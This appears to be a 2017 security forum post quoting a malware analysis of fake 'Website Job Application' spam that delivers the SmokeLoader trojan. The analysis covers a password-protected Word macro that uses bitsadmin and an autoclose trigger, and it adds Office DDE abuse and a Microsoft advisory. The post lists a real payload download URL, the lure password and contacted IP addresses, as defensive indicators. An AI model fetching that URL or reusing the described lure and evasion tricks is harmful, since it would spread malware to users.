Fake 'Website Job Application' SPAM, Office - malware delivery platform
FYI...
Fake 'Website Job Application' SPAM - delivers malware
- https://myonlinesecurity.co.uk/more-...erent-malware/
20 Dec 2017 - "... This is a continuation from these 3 previous posts about malware using resumes or job applications as the lure [1] [2] [3]... The primary change in delivery method is the use of a password for the word doc to try to bypass antivirus filters... Today’s version continues to SmokeLoader/Sharik trojan which is a downloader for -other- malware. An email with the subject of 'Website Job Application' coming from Rob Meyers <Gong@ latestmistake .com> (probably random names) with a malicious word doc attachment delivers SmokeLoader/ sharik trojan...
1] https://myonlinesecurity.co.uk/websi...be-ransomware/
2] https://myonlinesecurity.co.uk/spear...ds-to-malware/
3] https://myonlinesecurity.co.uk/fake-...liver-malware/
Screenshot: https://myonlinesecurity.co.uk/wp-co...sume_eml-1.png
Rob Resume.doc - Current Virus total detections 11/59*. Hybrid Analysis**... It should be noted that this malicious word doc and the downloaded malware either has some sort of anti-analysis protection or the malware delivery site will reject connections from known sandboxes, VM analysis tools and known researcher or antivirus IP addresses. Neither of the 2 Online sandboxes / analysis tools could retrieve the downloaded malware. That had to be done manually. They have continued with the previous behaviour of using BITS (bitsadmin.exe) to download the file instead of PowerShell. They also are still using “autoclose” in the macro so it doesn’t run until the word doc has been closed, so avoiding any obvious signs of infiltration. Also the downloaded file sleeps for a long, long time before doing anything. This malware downloads from
http ://80.82.67.217/paddle.jpg which of course it -not- an image file but a renamed .exe (ASxas.exe)
VirusTotal 8/67[4]. Hybrid Analysis[5]... HA shows a further download of a bitcoin miner (VirusTotal 43/66[6])
but Anyrun could not get anything despite leaving it running for 10 minutes...
This word doc looks like this:
> https://myonlinesecurity.co.uk/wp-co...sume_1_doc.png
And after you input the password from the email body (123456) you see a typical page asking you to enable editing and then macros and content:
> https://myonlinesecurity.co.uk/wp-co...sume_2_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d...is/1513715092/
Resume.doc
** https://www.hybrid-analysis.com/samp...ironmentId=100
4] https://www.virustotal.com/en/file/f...is/1513716371/
paddle.jpg.exe
5] https://www.hybrid-analysis.com/samp...ironmentId=100
DNS Requests
37.59.55.60
107.181.246.221
Contacted Hosts
139.59.208.246
107.181.246.221
188.165.214.95
6] https://www.virustotal.com/en/file/9...d51c/analysis/
bitcoinminer1
80.82.67.217: https://www.virustotal.com/en/ip-add...7/information/
> https://www.virustotal.com/en/url/f4...cbe9/analysis/
___
Office as a malware delivery platform: DDE, Scriptlets, Macro obfuscation
... Powerful behind-the-scenes features in Office have suddenly stepped back into the malware limelight, with an onslaught of mostly macro-less attacks starring jimmied Word, Excel and PowerPoint documents
> https://www.computerworld.com/articl...fuscation.html
Dec 19, 2017 - "... Some clever researchers have found new and unexpected ways to get Word, Excel and PowerPoint documents to deliver all sorts of malware — ransomware, snoopers, even a newly discovered credential stealer that specializes in gathering usernames and passwords. In many cases, these new uses employ methods as old as the hills. But the old warning signs don’t work as well as they once did..."
(Much more detail at the computerworld URL above.)
ADV170021 | Microsoft Office Defense in Depth Update
- https://portal.msrc.microsoft.com/en...sory/ADV170021
12/12/2017 - "... provides enhanced security as a defense-in-depth measure. The update disables the Dynamic Update Exchange protocol (DDE) in all supported editions of Microsoft Word..." - Also:
> https://docs.microsoft.com/en-us/sec...s/2017/4053440
Updated: Dec 12, 2017
>> https://www.askwoody.com/forums/topi...n/#post-153388
Dec 20, 2017
